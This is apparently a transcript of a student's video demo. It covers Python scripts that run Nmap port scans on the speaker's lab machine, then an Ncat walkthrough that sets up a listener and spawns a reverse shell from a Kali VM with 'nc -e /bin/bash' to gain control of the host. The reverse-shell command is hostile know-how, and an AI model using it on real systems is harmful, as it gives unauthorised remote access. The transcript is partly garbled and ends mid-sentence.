Hi, this is my second part of video where this is actually second part of my project. What I'm doing, the first one is about Nmap, and the second one is about NCAT. So Nmap is, as discussed yesterday, like in Wireshark, like it's about a protocol which actually scans the ports and then gives us a result. So whenever we just type Nmap, this is my Windows machine where I type Nmap, so I get lots of switches what I can actually run through this. So now what I've done with Nmap is that I've just created a simple Python scripts here to run Nmap script here. It's very simple that in a command line I can just get into it and then I just type Nmap and just give an IP, whatever I need to, scan, attacker's mission or something of that sort, then it will just give me the result. So if I need to do the same thing, in Python, so the thing what I need to do is to import the two important modules, that is socket and nmap. So these are very important libraries for us to run the script. And one of the most important commands what we use here in Python is about scan IP. Means we tell nmap to do a port scanning, dot port scanner. So based on which we can actually get all the outputs here. So now, for example, since it's in a current file, I just run this command and then it asks me for an IP address. So as usual, I'm just going to give an IP address of my mission. And my mission is, the host name is Wasim and the IP address is this. And the protocol which is used in Nmap is TCP because I have asked specifically. And I have also asked if it has that IP TCP. It says yes. So the state of that is true. And then I know I need to know what is the state. Is it open or closed? So I receive the result that the status is closed. And at last I need to know is what is the command syntax it used. Means like what we did here, just nmap IP. But by default in Python the syntax what it uses is nmap minus ox minus p22, which means that output in XML format. And it did not give us an XML format is because it's just one port what we have scanned here. And SV is nothing but to probe all the open ports to determine service or version info. So now moving on to the second script of Nmap, what I have created is about a range of ports which can be given for one particular IP address. So if we run this, then again it's going to ask me for an IP address. So as usual, I'm going to give the same IP address of my target mission. And the moment I give it, like it asks me for a port. So I'm just going to restrict it with very less number of ports because it will keep running every time. So if I say that I want the script to run from port 80 to 83, so it is going to give me an output every time. So basic is just by giving a for loop, right? So in for I just give a range, port start range, that is 80 what I've specified, and port end range 83. But then why 83 did not show up is because when it takes 80, then it takes three incremental loops, so 80, 81, and 82. If I wanted 83, then I should have clicked end range plus 1. So based on which I got to know that all these ports are closed in this IP. So now coming to the very simple script, one particular IP I need to give and with one particular port, then I just run the script. So I just again going to give a same IP and then I say 443 maybe a scan. So I'm just going to say that, just run and see and tell me if that port is open. So this port is actually closed. So now these are the scripts what I've created for Nmap, and then I have also created a batch files, and also I've created a Power Automate desktop using Power Automated Desktop at a scheduled times, which we can enhance the script further. So now coming to NCAT, so NCAT is very simple. That it is used to read, write, encrypted data, and NCAT really gets very interesting when for attackers because that is where they would try to exploit an open port. So now, in Python, since I could not find out the syntax of Python, so what I did is just to make this run as a command line, interface in Python. Just to do that, I just need to do import OS, and based on the OS, I can just give whatever command I need to, and then I can just run os.system of CMD. So the moment I run this file, so I will get a response. If this port 80 is open, then automatically it will start working on that. But then, since port 80 is closed, it gives me an error that no connection could be made because the target machine actively refused it. So now, just to demonstrate as how NCAT actually works, so what I have done is that I have opened a command prompt in my local machine, and then I just have run a command called ncat, that is with the switch lnvp, which means that to listen an IP address in a verbose mode of port number say 87 of my 192.168.50.238. What exactly this command does is to start listening. It just gives me an option that listening on this port. So it has started already listening on this port. Then what I actually do is I have another virtual machine which I have built, which is actually a Kali Linux for one of my previous projects before. And here, if you see that my host name is Rida. So the moment I enter, the command what I give here is where did I give? Yeah. So nc minus e bin bash 192.168.238.31337, the port which is open here. The moment I gave this, then automatically it actually started opening up the port. So now what I could actually do is that I can hack Kali Linux machine in a way that, for example, when I give who am I, for example, if I give in a normal command, then it gives me Wasim. But then when I give who am I, and then I just tried typing commands which did not work. And when I just give ls, it lists me all the folders and files here. So I just opened a new window where I could actually see this. So when I just opened ls, it gives me the same folders what I can see here. And this is where it gets interesting. And then I just entered into a desktop here, and once I entered desktop, I just created, I just tried creating an empty file called rida.txt. The moment I enter into cd desktop here, I am able to also see rida.txt. It means that I now have a complete control of Kali Linux from my Windows machine. So this is a power of